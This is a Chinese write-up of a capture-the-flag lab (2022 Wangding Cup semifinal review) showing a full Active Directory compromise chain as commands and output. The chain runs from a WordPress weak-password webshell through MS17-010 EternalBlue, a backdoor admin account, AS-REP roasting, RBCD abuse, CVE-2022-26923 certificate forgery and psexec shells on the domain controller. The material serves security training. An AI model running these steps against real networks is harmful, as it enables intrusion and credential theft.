1. 参考

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 39.98.112.16 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-02 02:06 EDT
Nmap scan report for 39.98.112.16
Host is up (0.00020s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 135.21 seconds

只开了一个 22 端口和 80 端口

访问 80 端口，很明显的 wordpress 框架

用 wpscan 扫描可以扫描到一个 admin 用户，爆破密码可以爆破出来 admin 的密码是 123456

1 2	[!] Valid Combinations Found: \| Username: admin, Password: 123456

进入后台之后修改主题文件 getshell

访问/wp-content/themes/twentytwentyone/404.php，蚁剑连接

flag01 在根目录

查看网络信息，然后上传 fscan 进行内网扫描

(www-data:/tmp) $ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 :: 1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e: 2d: a8: bd brd ff: ff: ff: ff: ff: ff
    inet 172.22.15.26/16 brd 172.22.255.255 scope global dynamic eth0
       valid_lft 1892159075sec preferred_lft 1892159075sec
    inet6 fe80:: 216:3eff: fe2d: a8bd/64 scope link 
       valid_lft forever preferred_lft forever

$ ./fscan -h 172.22.15.26/16 -time 10
 ___                              _
  / _ \     _ __  __ _ _ __ __ _  _ __| | __
 / /_\/____/ _ _|/ _ _| '_ _/ _` |/ __| |/ /
/ /_\\_ ____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \_ _,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.15.13    is alive
(icmp) Target 172.22.15.18    is alive
(icmp) Target 172.22.15.24    is alive
(icmp) Target 172.22.15.35    is alive
[*] Icmp alive hosts len is: 4
172.22.15.24:3306 open
172.22.15.35:445 open
172.22.15.13:445 open
172.22.15.18:445 open
172.22.15.35:139 open
172.22.15.24:139 open
172.22.15.18:139 open
172.22.15.13:139 open
172.22.15.35:135 open
172.22.15.24:135 open
172.22.15.13:135 open
172.22.15.18:135 open
172.22.15.24:80 open
172.22.15.18:80 open
172.22.15.24:445 open
172.22.15.13:88 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo:
[*]172.22.15.24
   [->] XR-WIN08
   [->] 172.22.15.24
[*] NetInfo:
[*]172.22.15.35
   [->] XR-0687
   [->] 172.22.15.35
[*] NetBios: 172.22.15.35    XIAORANG\XR-0687
[*] NetInfo:
[*]172.22.15.18
   [->] XR-CA
   [->] 172.22.15.18
[*] NetInfo:
[*]172.22.15.13
   [->] XR-DC01
   [->] 172.22.15.13
[+] 172.22.15.24 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] 172.22.15.13  (Windows Server 2016 Standard 14393)
[*] NetBios: 172.22.15.13    [+]DC XR-DC01.xiaorang.lab          Windows Server 2016 Standard 14393
[*] NetBios: 172.22.15.24    WORKGROUP\XR-WIN08                  Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] Webtoc: true
title: http://172.22.15.18       code: 200 len: 703    toc: true
title: IIS Windows Server
[*] NetBios: 172.22.15.18    XR-CA.xiaorang.lab                  Windows Server 2016 Standard 14393
[*] Webtoc: true
title: http://172.22.15.24       code: 302 len: 0      toc: true
title: None 跳转 url: http://172.22.15.24/www
[*] Webtoc: true
title: http://172.22.15.24/www/sys/index.php code: 200 len: 135    toc: true
title: None
[+] http://172.22.15.18 poc-yaml-active-directory-certsrv-detect
已完成 16/16
[*] 扫描结束, 耗时: 23.238579924s

可以发现 172.22.15.24 存在 MS17-010 漏洞，直接上 msf，但是用 msf 梭哈之前需要先搭建一层代理，可以用 Venom 搭建很方便

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
exploit

flag02 在 C:\users\administrator\flag 里，添加一个新用户然后远程桌面连接

1 2	net user ll Asd123123 /add net localgroup administrators ll /add

可以看到数据库的密码，这个站点还存在一个 phpmyadmin，尝试登录 root:root@#123，将 zdoo 库里面的 user 表导出来

#域内用户
lixiuying@xiaorang.lab
jiaxiaoliang@xiaorang.lab
wanglihong@xiaorang.lab
huachunmei@xiaorang.lab
zhangxinyu@xiaorang.lab
huzhigang@xiaorang.lab
lihongxia@xiaorang.lab
wangyulan@xiaorang.lab
chenjianhua@xiaorang.lab
zhangyi@xiaorang.lab
zhangli@xiaorang.lab
zhangwei@xiaorang.lab
liuqiang@xiaorang.lab
wangfang@xiaorang.lab
wangwei@xiaorang.lab
lixiaoliang@xiaorang.lab
wanghao@xiaorang.lab

将获得的账号放进 user.txt 里

使用 AS-REP Roasting 攻击，尝试获取用户的密码

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-GetNPUsers xiaorang.lab/ -dc-ip 172.22.15.13 -usersfile users.txt -format hashcat
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

/usr/share/doc/python3-impacket/examples/GetNPUsers.py: 165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days = 1)
$krb5asrep$ 23 $lixiuying@xiaorang.lab@XIAORANG.LAB:28dc48860e014c6d18a29bad65ba6cc8$ b6924f808e7a4d56bd403bc0e5286ad6b1cb1a39ee59331e484a90801fa82bbcb6b685236b61c5976a05330006b74f304fcfb56793de9c78d38caa16075bef947ad898c8b1130dad240a8298a98e86f18af90cebb015502c7758d6a32c366a42395d08877902d303ee0662540653b3c87c14d6d5319b63e5c5eaf6250d7e82d48d57afc56492344b618b054d6a75cf5ee014f00e92311479dba0ccb54c77b072213a42b79862f913a77a6b0fae4f9a67755ca83b583220c30b6f77296098c71bb42a2cbd8197bcd4e30598ecfbf519899b44cc5d723a4a49fc26db1a4b678a1afd4acea4b42b72949e677edd
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$ 23 $huachunmei@xiaorang.lab@XIAORANG.LAB:2fad79d14745c573303bd34c39f80e7f$ 0d9522fc4669f0e04b80e36cef3370c1cce5e232e2b131d6d652c7e2dad452a86918cfbd25e78a701896943ba6b50e241f27b8af4b5d79cffef11fd4ee2392325a468f8ff648e70a74e7d9d2ce58990dc91b36a5c84c2ffa7f45e7cdd852dc2a8df1e5e2f9491eb5c5753cdf54cac6cc2eed2a8b9b58c3693b058fcb6a6187ae49c4d80732aa40e0e3296313962128d414b85f75cb87af301ca39664fffc192e1b62755178c4c6b8f13dd70ff912c4f637a970f33bc367e84e4c1dcb31ade4a20b0bdf8bd7c64c19adf091f4850a8ea2c7a7428bbcb17ef7c87e02ae3b5f9637902612ba8fbe65b7599a7d7e
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User lihongxia@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wangyulan@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User chenjianhua@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

返回了两个票据, 用 hashcat 爆破

┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat -m 18200 user.txt /usr/share/wordlists/rockyou.txt --show
[proxychains] DLL init: proxychains-ng 4.17
$krb5asrep$ 23 $lixiuying@xiaorang.lab@XIAORANG.LAB:dbd1dee4c07eea9541a9f1af91b93180$ b4d238908b8d37009f9dfb5402a13f1b60567f4f8185fbbf5c9fbefe14bbe0b1f89980cd604ff68b572afe6af2d1bb4d6720abc8bdc51e47df9da3ebb4801d08f8be90c12343699eff8855dbfc0d63e796ffcec62169fa4e3ee97440ca0eb2eb985e6785f93aa1d34444235b1ce8937acf0121fe05ec2c589ba625fab1c90bd168637124f99378007fa9c459b07f946a65d3c7131cdad16af4b591becc04526125e2c255072df4a32214d393aab5f27cff28b66859c1b9bb06600d4c7a51cd7ae583d4602fd1ebd6ffc269ee60ed861abb28bb547de5e848955d5279d9e08523edb67fbd171d1af1730f2fba: winniethepooh
$krb5asrep$ 23 $huachunmei@xiaorang.lab@XIAORANG.LAB:c640ad4dd669f00b128bad8d1ef8df86$ 0b8e74c7b36ec7daceb707ce176d18a8d15f8cd3ba3154f8ae4f29e9e54f538ab19bc766ea554698677d7f1e6f9418fd7419d82a1ca79582ed70f3de5b5c771a6e7df373fc84a9921b697e7c7d42c17e85f1b2ae73b1ec15bf1bbc59e20bfb2d4e5e52c53c1e88da9c0815434acd8298948f7becb0f15bfdcce4153d025570249523f7507c20f694f5e0ec23c8e7ef5d446aa5fec15315ab314658fc36befc39d7cdf037fa1f165a83ab257fa34a17c4b512ccca27284b97d8f7bdf51cdb0a069e2df4f952c3c52fa47fb58a0fe4e80d0907062fad92edf4d799306ddb103468accf1c2a6b172f2bd7d7c61d: 1qaz2wsx

用 bloodhound 进行域内信息搜集

┌──(root㉿kali)-[~/Desktop/tmp]
└─# bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -dc XR-DC01.xiaorang.lab -c all --dns-tcp -ns 172.22.15.13 --auth-method ntlm --zip
INFO: Found AD domain: xiaorang.lab
INFO: Connecting to LDAP server: XR-DC01.xiaorang.lab
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: XR-DC01.xiaorang.lab
INFO: Found 37 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: XR-CA.xiaorang.lab
INFO: Querying computer: XR-0687.xiaorang.lab
INFO: Querying computer: XR-DC01.xiaorang.lab
INFO: Done in 00M 05S
INFO: Compressing output into 20250402040344_bloodhound.zip

域用户 LIXIUYING 对计算机 XR-0687$ 具有 Generic Write 权限

可以通过修改目标的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性（配置 RBCD）获取目标 SYSTEM 权限。

添加一个机器用户

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-addcomputer -computer-name 'EVILCOMPUTER$' -computer-pass '123@#ABC' -dc-host XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 " xiaorang.lab/lixiuying: winniethepooh "
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account EVILCOMPUTER$ with password 123@#ABC.

然后配置 RBCD：

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-rbcd xiaorang.lab/lixiuying: winniethepooh -action write -delegate-from "EVILCOMPUTER $" -delegate-to "XR-0687$" -dc-ip 172.22.15.13
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EVILCOMPUTER $ can now impersonate users on XR-0687$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     EVILCOMPUTER$   (S-1-5-21-3745972894-1678056601-2622918667-1147)

请求并冒充域管权限的服务票据：

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-getST xiaorang.lab/EVILCOMPUTER$:'123@#ABC' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache

──(root㉿kali)-[~/Desktop/tmp]
└─#  export KRB5CCNAME = Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-psexec 'xiaorang.lab/administrator@XR-0687.xiaorang.lab' -target-ip 172.22.15.35 -codec gbk -no-pass -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 172.22.15.35.....
[*] Found writable share ADMIN$
[*] Uploading file RHzxEZPZ.exe
[*] Opening SVCManager on 172.22.15.35.....
[*] Creating service etRo on 172.22.15.35.....
[*] Starting service etRo.....
[!] Press help for extra shell commands
Microsoft Windows [版本 10.0.20348.1668]
(c) Microsoft Corporation。保留所有权利。

C:\Windows\system32 >

flag03 在 C:\users\Administrator\flag\

主机 172.22.15.18 (XR-CA) 存在 CVE-2022-26923 漏洞

打 CVE-2022–26923

查找证书服务器，并尝试查找可以利用的证书模板：

┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad find -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'xiaorang-XR-CA-CA' via CSRA
[!] Got error while trying to get CA configuration for 'xiaorang-XR-CA-CA' via CSRA: Could not connect: [Errno 111] Connection refused
[*] Trying to get CA configuration for 'xiaorang-XR-CA-CA' via RRP
[!] Got error while trying to get CA configuration for 'xiaorang-XR-CA-CA' via RRP: [Errno Connection error (224.0.0.1:445)] [Errno 111] Connection refused
[!] Failed to get CA configuration for 'xiaorang-XR-CA-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : xiaorang-XR-CA-CA
    DNS Name                            : XR-CA.xiaorang.lab
    Certificate Subject                 : CN = xiaorang-XR-CA-CA, DC = xiaorang, DC = lab
    Certificate Serial Number           : 3ECFB0112E93BE9041059FA6DBB3C35A
    Certificate Validity Start          : 2023-06-03 07:19:59+00:00
    Certificate Validity End            : 2028-06-03 07:29:58+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
Certificate Templates                   : [!] Could not find any certificate templates

使用 certipy 创建一个机器账户，并将该机器账户 dNSHostName 属性指向域控：

┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad account create -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -user 'EVILCOMPUTER2$' -pass '123@#ABC' -dns 'XR-DC01.xiaorang.lab'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Creating new account:
    sAMAccountName                      : EVILCOMPUTER2$
    unicodePwd                          : 123@#ABC
    userAccountControl                  : 4096
    servicePrincipalName                : HOST/EVILCOMPUTER2
                                          RestrictedKrbHost/EVILCOMPUTER2
    dnsHostName                         : XR-DC01.xiaorang.lab
[*] Successfully created account 'EVILCOMPUTER2$' with password '123@#ABC'

使用该机器账户向 AD CS 服务器请求域控机器的证书模板：

┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad req -u EVILCOMPUTER2\$@xiaorang.lab -p '123@#ABC' -target 172.22.15.18 -ca "xiaorang-XR-CA-CA" -template Machine
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with DNS Host Name 'XR-DC01.xiaorang.lab'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'xr-dc01.pfx'

用申请到的证书，申请域控的 TGT：

┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad auth -pfx xr-dc01.pfx -dc-ip 172.22.15.13 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: xr-dc01$@xiaorang.lab
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

使用 certipy 请求 TGT 失败，出现 KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type) 错误。

bloodyAD 使用证书进行认证，配置 RBCD 进行攻击：

┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad cert -pfx xr-dc01.pfx > xr-dc01.pem
Certipy v4.8.2 - by Oliver Lyak (ly4k)
┌──(root㉿kali)-[~/Desktop/tmp]
└─# bloodyAD -d xiaorang.lab -u 'EVILCOMPUTER2 $' -c ':xr-dc01.pem' --host 172.22.15.13 --secure add rbcd 'xr-dc01$' 'EVILCOMPUTER2$'
[!] No security descriptor has been returned, a new one will be created
[+] EVILCOMPUTER2 $ can now impersonate users on xr-dc01$ via S4U2Proxy

请求并冒充域管权限的服务票据：

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-getST 'xiaorang.lab/EVILCOMPUTER2$: 123@#ABC' -spn LDAP/xr-dc01.xiaorang.lab -impersonate Administrator
 -dc-ip 172.22.15.13
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for user
[*] Impersonating Administrator
/usr/share/doc/python3-impacket/examples/getST.py: 380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py: 477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days = 1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py: 607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py: 659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days = 1)
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@LDAP_xr-dc01.xiaorang.lab@XIAORANG.LAB.ccache
┌──(root㉿kali)-[~/Desktop/tmp]
└─# export KRB5CCNAME = Administrator@LDAP_xr-dc01.xiaorang.lab@XIAORANG.LAB.ccache

DCSync 从域控导出凭据：
┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-secretsdump 'xiaorang.lab/administrator@XR-DC01.xiaorang.lab' -target-ip 172.22.15.13 -no-pass -k -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid: rid: lmhash: nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] 'NoneType' object has no attribute 'getRemoteHost'
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

PTH 登录域控：
┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-psexec 'xiaorang.lab/administrator@XR-DC01.xiaorang.lab' -target-ip 172.22.15.13 -codec gbk -no-pass -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 172.22.15.13.....
[*] Found writable share ADMIN$
[*] Uploading file FavsxEaA.exe
[*] Opening SVCManager on 172.22.15.13.....
[*] Creating service fjnA on 172.22.15.13.....
[*] Starting service fjnA.....
[!] Press help for extra shell commands
Microsoft Windows [版本 10.0.14393]
(c) 2016 Microsoft Corporation。保留所有权利。

C:\windows\system32 >

flag 在 C:\Users\Administrator\flag 下

参考

https://h0ny.github.io/posts/2022%E7%BD%91%E9%BC%8E%E6%9D%AF%E5%8D%8A%E5%86%B3%E8%B5%9B%E5%A4%8D%E7%9B%98-%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/#as-rep-roasting

https://x1nri.github.io/2025/01/24/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-2022%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%BD%91%E9%BC%8E%E6%9D%AF%E5%8D%8A%E5%86%B3/

本作品采用知识共享署名-相同方式共享 4.0 国际许可协议进行许可

lvzhouhang

春秋云镜-2022网鼎杯半决赛复盘

参考